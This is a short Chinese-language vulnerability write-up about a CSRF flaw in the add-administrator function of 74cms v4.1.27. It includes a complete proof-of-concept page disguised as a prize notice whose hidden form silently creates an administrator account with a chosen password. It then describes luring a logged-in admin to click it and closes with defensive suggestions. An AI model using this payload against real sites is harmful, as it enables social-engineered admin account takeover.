74cms CSRF漏洞可以诱骗添加管理员

注:本文章只是简单的发现了74cms[骑士cms] v4.1.27添加管理员时产生的CSRF漏洞


1.正常情况下,管理员会登录后,进入到【系统】-【网络管理员】-【添加管理员】中,进行添加管理员。



填写好相关数据后,管理员正常进行添加。然后我们看看抓取到的数据


然后我尝试伪造一个假页面,内容如下:

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>恭喜你中奖啦</title>
</head>
  <body>
	<img src="img/bonus.jpg"/>
	    <form action="http://www.a.com/cms/index.php?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
        <input type="hidden" name="username" value="test_hi">
        <input type="hidden" name="email" value="[email protected]">
        <input type="hidden" name="password" value="admin">
        <input type="hidden" name="repassword" value="admin">
        <input type="hidden" name="role_id" value="1">
        <input type="hidden" name="submit3" value="添加">
		<button type="submit" value="Submit">进入领取</button>
      </form>
  </body>
</html>
显示效果如下图:


然后我们诱骗真实的管理员在登录后,去访问这个页面。

当管理员点击进入领取时,直接就执行了操作,因此实现了一个简单的CSRF的攻击。


然后我们可以看到在管理员那一栏目,新增了一个“test_hi”的管理员,密码由伪造者设置[演示中是admin],如果真正的管理员没有及时发现,那么此账号“test_hi”就可以利用。


尝试登录后,就可以看到,登录成功。


我所想到的防御:

1.在添加管理时检测相关参数和页面来源[Referer]

2.由于管理员权限较高,因此在添加时建议强制要求管理员输入自己的密码进行确认。


本文只是讲解了74CMS的一个小问题,文章写得不足不到之处,欢迎大家批评指正。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章